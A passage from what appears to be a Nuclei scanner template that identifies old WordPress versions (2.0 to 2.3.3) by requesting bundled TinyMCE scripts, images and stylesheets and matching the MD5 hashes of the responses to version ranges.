"(\"7c1b8f3d2d9f49bc3bfb82f39365825f\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"614a9bef1a1ea2320ded644ee554452a\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"aa0bf6f829e3f5aba187180e5b4a562d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/image.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"84624af8d91ef4844b2a0c63a189e126\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"274835b88f02a287ea8c3c8037536e53\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/link.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"43375669c230d406aaf97e02ebb11ce5\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"e2d602453cfdf9a25eb486a601119a20\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"dfe1b584400bd3a2d34c3d631fcbd7f0\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"8d6af59e826a2f12743af96a883b64da\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/jscripts/anchor.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4fb4a4ac51be664a0dbb5ef2cdb15d7c\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"6e13f946344844a532a8b5b06af27bba\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/newdocument.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"24b01aa27845c551f24a186a92cbc94e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/charmap.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"948c608cfe393168642e3946097eba3d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/left.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyright.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_before.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"d5910a210405a8cc7a24086104b06fa1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_fr.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"8fbda35d5ebfc1474f93f808953b1386\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_tw.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"c87ed929e41850e9614753da98827272\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"d4eac7372d4d546db5110407596720dd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_tw.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"6384b264f47452af481f36e1aa689bd7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_es.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"61553fb992530dbbbad211eddcc66eb9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bullist.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"f360470402affab13062de5ffbfb7f74\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/numlist.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"d4c72d6e6d56fee2315ad59426a99a4e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cancel_button_bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"23ba9eb7eb91efec2014bbf0ecb7422b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cleanup.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"96382d6d24bb8a1b228586b323e72fb4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_col.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"05582820e152a8b53d3fb3e622a0c974\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_after.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"f244bea608118e1b6609d1ade714ecd5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor_symbol.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"5cb42865ce70a58d420786854fed4ae1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/indent.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"89c00ba134c89eb949411194060c135c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/menu_check.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"fce7c811d7adec70ce79ee7c4185ec47\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/help.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/statusbar_resize.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"1b952cd23844b834e0a307db3c803626\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/buttons.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"bc347ed84b0c8acfebf391e3716d3908\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"4ad67d7e69bdc6cf5f43126479e39469\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyleft.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"7e1153a270935427f7b61c7b6c21ab8a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/browse.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"bc730549b16f827d1c04db513e34d011\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_es.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"8b9992b808d64bde50606703bf29b9e5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/insert_button_bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"93699e9345172ce5eaa5876d432aaa19\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/separator.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"9636c1e228dc5d7c58ec2722a6d9ec23\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/opacity.png" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"7f1c7b1ff1f3e04828540f6ffdde46c2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/button_menu.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"ed293e6a817f44328f74c0853c628e69\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"3ca9c0469bf52d46fd0b939bac08eb8d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/backcolor.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"159795ca1b1fd16f310334db6c917515\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"e6a384f19aef7c0fb2f2e0ee0bdc72e0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_de_se.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"2eafa516095a0d8b3cd03e7b8a4430f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_end.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"6a4ffda436f2ffe5a56107d6c8c5a332\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tabs_bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"b3a2d232dd5bf5e8a829571bbec08522\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_end.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"de9e554769bc24fc7f2acefddb04e895\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_sel_bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"9787ead6369f4cb45f69e4dea1ceaeb1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/xp/tab_bg.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"276f3f45f0d50a533187aefa7ce6b210\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic_ru.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"bbc7be374d89a1ced0441287eeba297a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/outdent.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"b7249cc5a3bce3971f0b19fccac07f60\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/undo.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"7883b9e1f9bf0b860e77b904e1941591\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/colors.jpg" - matchers: - - type: dsl - name: 2.2.1 - 2.3.3 - dsl: - - "(\"02ae48639aa5729e6a40fb64455c32a2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/unlink.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"dcd93dd109c065562fe9f5d6f978a028\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"203e5139ee72c00d597e4b00ed96d84b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/code.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"158e1ad2922f59a800e27e459c71d051\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/removeformat.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"e9c387cc80f33b14447b628df1906639\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_delete_row.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"b6943c3ba64c56ea086d33b21d66004a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_fr.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifycenter.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/hr.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"8d92cb73437c32a0327323b538ad2214\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/color.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"c8e11c751b5575025fc50b7701719f0f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_tw.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"3236a0d3fca6a4a381da0f2b2a9337e8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_ru.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"843cb1b52316024629bdc6adc665b918\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/center.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"9cc7a9c3f4c2a697c32aaab6bb3185b8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_col_after.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"48b353ad270b0e05d7de456cd811c420\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/visualaid.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"50cfb5ef70eadd59e78c6c833c8a5239\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/spacer.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"12bf9e19374920de3146a64775f46a5e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/forecolor.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"6b4b8602d61e17fc13a8e1abd284ecd3\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"9e936f32d2bf0338d1e261d18a1532e4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/right.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"94fafae0c4b30d01d034a54376acdac3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/custom_1.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"bd1f96d299847c47fd535b1b54d3a2df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/justifyfull.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/paste.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"7bde577f9f26ffb18e522331270140f2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/full.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"009750822e228e10f51e746ddf8d1fec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/strikethrough.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"0dcca301aa909817a82d705cc9a62952\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sub.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"dfbcf5f590c7a7d972f2750bf3e56a72\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/link.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"010306c94f6b00146d9eda296a945040\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/underline_es.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"027608183023f80b0c9bf663c9e81301\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/sup.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"cec59878503a628b343ff844f81aff1f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_de_se.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"fa8d362da3c15cab263bc7eb2d192dd1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/bold_ru.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"d70c4659f516157591c2470695c6d64e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/table_insert_row_before.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"0e37e4c48dcddb1123bc6140ce323694\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/copy.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"51e409b11aa51c150090697429a953ed\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/redo.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"c2b3b80e20aa7f50ec45acb999373425\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/image.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"a74e3cc061c26a326844ec06f65b9a1f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/anchor.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"7bcf9bd9100fe611646435390e1158d5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/cut.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"c8f1a0b1cc8e32e10cdf3d38f71bf44f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/italic.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"c8652735e55a968a2dd24d286c89642e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/images/close.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"6cc9d27bdda91ad192a4326a653ba566\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/langs/en.js" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"4841943ffffb477d082fbf8a3937b4d3\" == md5(body))" - - type: dsl - name: 2.2 - 2.2.3 - dsl: - - "(\"890a670585bdaa592de8dcb490136d2e\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"f886e44ef37b8158c5be50bca0b72480\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"d31d6fcc58943a8c8792f1d1271be703\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_popup.css" - matchers: - - type: dsl - name: 2.3 - 2.3.3 - dsl: - - "(\"66e83a9a61c15fb26106264a8c5ddea8\" == md5(body))" - - type: dsl - name: 2.1 - 2.2.3 - dsl: - - "(\"b86dfe84d14780cc3c9b35781809f046\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"4618d2b44763abe1f922992bad409cd2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/colorpicker.css" - matchers: - - type: dsl - name: 2.2.1 - 2.3.3 - dsl: - - "(\"61140d3dc718dca29e319aa3072e6f9f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_content.css" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"577740b3c4125b3eef84905151a9f0ff\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"df0e44ab19a98d7b5324a5b83a4bf0b4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/themes/advanced/css/editor_ui.css" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"16814b0e0cc2e6bbacc6c715f191bc10\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"892361760081259446f63b7a5896d626\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"3eff88011ee850654648663924d58483\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/spellchecker.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"a190764ce4e0f7a227b89a9ce267abcd\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/images/wline.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"c136c9f8e00718a98947a21d8adbcc56\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/langs/en.js" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"391dfb5bc08361e0aaf6acc83d1b9e9c\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"76d3b8f92d5fe33102d22036864532e3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/spellchecker/css/spellchecker.css" - matchers: - - type: dsl - name: 2.2 - 2.3.3 - dsl: - - "(\"6a3879ddf4a1422a4d297f884272b231\" == md5(body))" - - type: dsl - name: 2.1 - 2.1.3 - dsl: - - "(\"7617a08b84cb3c3c7e1b6ba3c999055c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/editor_plugin.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"d84f3a83a5ea5531637c497081f61b2f\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"baa7d736a8373a4403f36839ae29e011\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/images/help.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"4cd4a5d2cdcd74c8aeced17813afd6ea\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wphelp/langs/en.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"487b329696681dcf9ea87ec093da28ad\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"4393d22c761bf437231826cd8521dcdf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pasteword.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"af0196506a000742794e61b964a9e98c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/jscripts/pastetext.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"a94aa9143e2ba3e944e95afc7aebc108\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/selectall.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4dbdedd53f48a7df7d6c1366169d415f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pastetext.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"84bf65d144efe912c49f848f8ab955c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/images/pasteword.gif" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"4126df7324911c861b159df6217a820e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/paste/langs/en.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"a1c015c6ec40c0a355d41fceb42e5d2e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/editor_plugin_src.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"5693ef7bb68cb84f97cfdbcb9df64d07\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"3d97f94c8e7e1ad347c43b40329da025\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/autosave/langs/en.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"f005861cf489c578796a76a7278084b3\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"b1e0027134a866f286b1e2dd314f9578\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/jscripts/mcwindows.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"f6ff4ebb7c6c53317abdb6d39c05d065\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_minimize.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"db7caf5944c85fa8d1fdfe9786672e16\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_close.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"dbd0ef59421094496fc06f00754cd28f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/spacer.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"221d8352905f2c38b3cb2bd191d630b0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_resize.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"7becf074be57ca4c386dda61ec406668\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/images/window_maximize.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"b346e6682287174fe73f2ad522c7df22\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/inlinepopups/css/inlinepopup.css" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"323476688c03e43d7c71f427b7d176dc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/rtl.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"69981824e7e2d3e2bc1e431f506e509e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/images/ltr.gif" - matchers: - - type: dsl - name: 2.0 - 2.3.3 - dsl: - - "(\"85865a3e9b3b3be7e67906bd3b2fc46f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/directionality/langs/en.js" - matchers: - - type: dsl - name: 2.1 - 2.3.3 - dsl: - - "(\"368301dad33c512083c89420d46d4740\" == md5(body))" - - type: dsl - name: 2.0 - 2.0.11 - dsl: - - "(\"72843c656a5452135613174035d9d42a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wordpress/images/help.gif" - 